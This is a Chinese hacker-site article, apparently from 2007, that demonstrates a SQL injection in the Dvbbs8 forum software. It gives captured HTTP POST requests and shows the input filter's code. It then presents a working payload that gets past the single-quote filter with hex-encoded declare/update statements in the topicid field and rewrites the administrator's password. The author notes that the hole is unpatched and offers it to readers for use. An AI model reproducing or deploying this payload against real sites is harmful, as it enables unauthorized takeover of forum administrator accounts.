黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[推荐]Dvbbs8严重漏洞
      ★★★★★

Dvbbs8严重漏洞

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-8-11 10:48:57
我这边已经假设好了一个DVBBS8 SQL:
我们先来注册一个用户,随便找个帖子。刚才弄坏了。。。。
我们来重新发个帖子。点发表评论,这里来抓包
以下是引用片段:
POST /dvbbs8/Appraise.asp?action=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://192.168.1.91/dvbbs8/dispbbs.asp?boardID=1&ID=2&page=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
Host: 192.168.1.91
Content-Length: 91
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=UserID=3&usercookies=0&StatUserID=197615644&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=allyesno&password=v0qdt2f765U6x7J5&userhidden=2; w0802=3; rtime=0; ltime=1186473801000; w08_eid=88452409-http%3A//192.168.1.91/dvbbs8/index.asp%3Fboardid%3D1; geturl=%2Fdvbbs8%2Fpost%5Fupload%2Easp%3Fboardid%3D1; ASPSESSIONIDACCRCQQQ=FDKDFDBAOGGEGNICMPBANLKL; Dvbbs=cacgffcf; upNum=0

boardid=1&topicid=2&announceid=2&atype=0&a1=0&a2=0&atitle=11111&acodestr=0425&acontent=test

userpost是用户发表过的帖子数量。算错了

以下是引用片段:
script language='javascript'> <font face="宋体" size=2><p>
Microsoft OLE DB Provider for SQL Server</font> <font face="宋体" size=2>错误:'80040e14'</font><p>
font face="宋体" size=2>第 1 行: ';' 附近有语法错误。</font><p>
font face="宋体" size=2>/dvbbs8/inc/Dv_ClsMain.asp</font><font face="宋体" size=2>,行 1504</font>


出现一个这个,不要管他,其实我们已经修改成功了!
文章:100
我们继续来修改,其实是这样的,程序有点小问题需要我们来解决
以下是引用片段:
TopicID = Dvbbs.CheckStr(Request.Form("topicid"))

Public Function Checkstr(Str)
 If Isnull(Str) Then
 CheckStr = ""
 Exit Function
 End If
 Str = Replace(Str,Chr(0),"")
 CheckStr = Replace(Str,"'","''")
 End Function

很明显过滤了单引号。。。。我们这样来饶过
还是修改一下密码吧,现在ADMIN的密码是admin888,我们来把他修改成123456[/code]declare @a sysname
select @a=0x3400390062006100350039006100620062006500350036006500300035003700
update [dv_user] set userpassword=@a where userid=1[/code]这样可以修改成功!!!我们把他改回来

以下是引用片段:
%3Bdeclare+@a+sysname+select+@a%3D0x3400390062006100350039006100620062006500350036006500300035003700+update+dv%5Fuser+set+userpassword%3D@a+where+userid%3D1
OK,这句语句也可以执行
156
POST /dvbbs8/Appraise.asp?action=save HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://192.168.1.91/dvbbs8/dispbbs.asp?boardID=1&ID=3&page=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
Host: 192.168.1.91
Content-Length: 242
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: DvForum=UserID=3&usercookies=0&StatUserID=197615644&userclass=%C2%DB%CC%B3%D3%CE%C3%F1&username=allyesno&password=Y1tGx4j886XtB846&userhidden=2; List=list1=1; w0802=5; rtime=0; ltime=1186474916718; w08_eid=88452409-http%3A//192.168.1.91/dvbbs8/index.asp%3Fboardid%3D1; geturl=%2Fdvbbs8%2Fpost%5Fupload%2Easp%3Fboardid%3D1; ASPSESSIONIDACCRCQQQ=FDKDFDBAOGGEGNICMPBANLKL; Dvbbs=cacgffcf; upNum=0

boardid=1&topicid=3%3Bdeclare+@a+sysname+select+@a%3D0x3400390062006100350039006100620062006500350036006500300035003700+update+dv%5Fuser+set+userpassword%3D@a+where+userid%3D1&announceid=3&atype=0&a1=0&a2=0&atitle=22&acodestr=3297&acontent=33

看见没,已经修改成了123456

由于漏洞比较严重,请大家谨慎使用,官方还未打补丁!!!!!!

文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体:
    中介交易区
    最 新 热 门
    实例讲解跨站入侵攻防战之攻击篇05-08
    对偶偶娱乐分站服务器的安全检测04-23
    入侵88red系统的详细过程04-07
    对趋势科技等数万网站被攻击的分03-21
    凡人网络购物系统 V8.0 简体中文03-18
    linux平台下渗透日本著名XXXXXX.03-18
    搜索框所引起的XSS漏洞03-05
    跳转漏洞的利用03-05
    对复旦大学的一次漫长渗透03-03
    .net一句话马以及dx论坛拿shell03-01
    php渗透入侵过程图文详解03-01
    DJ网站的入侵详细过程02-26
    相 关 文 章
    MS Internet Explorer GDI+ Proof of C
    Windows 98 最新登录漏洞
    PhpCms2007 sp6 SQL漏洞注入0day代码
    EmpireCMS47 SQL注入漏洞利用代码
    动网Dvbbs·php 2.0++ Blind SQL注入漏
    DEDECMS跨站及爆绝对路径漏洞
    多款RSS阅读器出现XSS漏洞
    MS08-052 WMF漏洞分析及漏洞检测
    如何检查并堵住网站的eWebEditor漏洞
    超星浏览器4.0漏洞0day & Exp
    Z-Blog死循环漏洞攻击造成博客频繁弹窗
    PhpBazar adid SQL注入漏洞
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886